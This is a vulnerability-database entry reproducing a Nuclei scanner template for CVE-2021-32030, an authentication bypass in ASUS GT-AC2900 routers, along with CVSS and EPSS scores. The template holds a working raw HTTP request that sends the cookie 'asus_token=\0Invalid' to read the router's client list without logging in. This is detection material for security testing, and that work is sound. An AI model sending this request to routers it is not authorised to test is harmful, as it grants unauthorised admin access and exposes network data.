Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-32030
HistoryAug 16, 2021 - 11:13 a.m.

ASUS GT-AC2900 - Authentication Bypass

2021-08-1611:13:22
ProjectDiscovery
github.com
4

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

0.551 Medium

EPSS

Percentile

97.7%

“ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator application. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of ‘\0’ matches the device’s default value of ‘\0’ in some situations.”

id: CVE-2021-32030

info:
  name: ASUS GT-AC2900 - Authentication Bypass
  author: gy741
  severity: critical
  description: "ASUS GT-AC2900 devices before 3.0.0.4.386.42643 allows authentication bypass when processing remote input from an unauthenticated user, leading to unauthorized access to the administrator application. This relates to handle_request in router/httpd/httpd.c and auth_check in web_hook.o. An attacker-supplied value of '\0' matches the device's default value of '\0' in some situations."
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access to the router's settings, allowing an attacker to modify configurations, intercept network traffic, or launch further attacks.
  remediation: |
    Apply the latest firmware update provided by ASUS to fix the authentication bypass vulnerability (CVE-2021-32030).
  reference:
    - https://www.atredis.com/blog/2021/4/30/asus-authentication-bypass
    - https://nvd.nist.gov/vuln/detail/CVE-2021-32030
    - https://github.com/atredispartners/advisories/blob/master/ATREDIS-2020-0010.md
    - https://www.asus.com/Networking-IoT-Servers/WiFi-Routers/ASUS-Gaming-Routers/RT-AC2900/HelpDesk_BIOS/
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-32030
    cwe-id: CWE-287
    epss-score: 0.48092
    epss-percentile: 0.9739
    cpe: cpe:2.3:o:asus:gt-ac2900_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: asus
    product: gt-ac2900_firmware
  tags: cve2021,cve,asus,auth-bypass,router

http:
  - raw:
      - |
        GET /appGet.cgi?hook=get_cfg_clientlist() HTTP/1.1
        Host: {{Hostname}}
        User-Agent: asusrouter--
        Referer: {{BaseURL}}
        Cookie: asus_token=\0Invalid; clickedItem_tab=0

    matchers-condition: and
    matchers:
      - type: word
        part: header
        words:
          - application/json

      - type: word
        words:
          - "get_cfg_clientlist"
          - "alias"
          - "model_name"
        condition: and

      - type: status
        status:
          - 200
# digest: 490a00463044022017a99b0dbcb7156774fecefd56dc839f32ad4c10124e7b7c024b15913ce6edca0220272077c41feca50f7508d555d34b81f8063ea73eb3c1be6a19bdf83c0b6529bb:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

9.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

9.8 High

AI Score

Confidence

High

0.551 Medium

EPSS

Percentile

97.7%

Related for NUCLEI:CVE-2021-32030